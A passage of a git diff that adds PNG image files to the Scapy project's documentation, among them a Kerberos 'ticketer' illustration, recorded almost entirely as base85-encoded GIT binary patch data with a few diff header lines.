zfUb-}@`8`V?(?sw!T`U?hrXe0d~n&Yi*HbNxzc55`nxI17E`{Q{DIjftDn8|r{uu_ zcGWAisYi6gwy9KfiRt=Fds2Ls-Y|MunbK~+#Jvj|4W5Cs8?B7l{9k6}wmA+yRprda z1d?ks+Et7!79CKnt}fv8%k1WXXfD68(P~;!e#6F*bH95(zslY{eWfaGZE9{9+~_i2 zud$J>CnDvj9Cv9g9(<_3VDWJCa3OFf>Xz4#y0R5mqry=iVKm}i)rN;#$4_-kHjuey ztZlNKF<$Ozgk5yX3P`>~jThKn=LxKaefU+Z24{D1ZrVD*@r7Q0u{6ccy5igy9w;JZ|tk$ zk7@gz$-Z(r)zRtr+Lw8$PG_#`{$^+VYv?ao2iSRRL;$m1`BH~nS>urcM$YAxK?2{T z(?{|fLLOC|IG|f}Oonub-t)~{xgh%hWa?m?^m>vc8?3-)*H{aibWV?f+T2{}jbfNVcy< zOoOwT!p&X77J2oN_#%0Kr6cQXza|9maInT;B`BD#3u=KXTckdMy6qtdBFDtMOf#%2 zUY0whTp1KhuoH&UT|~wGK4?`rk-BAp0++Iytc_tPY21$C>dw3T1{lvd&4LR8-sLaa z@nLStdwd_U`lW_7Y%^x9Ki=7$rnXHrGY~Mu`QyGF@8Ha@)YTM>gRr-TJ`S>jH#z9+Q@PMYPeJ__}Ab@xzS2^rlh zL8YFc)EZ>;feTl#TVQ6&+n{s~;NuiO5HJOL;>-$$V*miS>~q`9$KKZGiM*ZH6Yvjk zQ~aich`5BvO&Oz`H{@^Jl$Vqf78jQn7dO2UV*G#oz}4N}@oC`y`v+Hoe=UJOND4AC z^YQj`khgPpb$#OI15Rc>8+zzrHd zXo66RC_uRhlp^{#`nWs+&Ye4Fcw5)V`j)=6!R-ek%6GJMZ|QuzD}4m~Dxh^+SEE?X H=EeU3>$9T^ literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/kerberos/ticketer.png b/doc/scapy/graphics/kerberos/ticketer.png new file mode 100644 index 0000000000000000000000000000000000000000..ce6197829485381ca48646b635f39352d768c462 GIT binary patch literal 174507 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 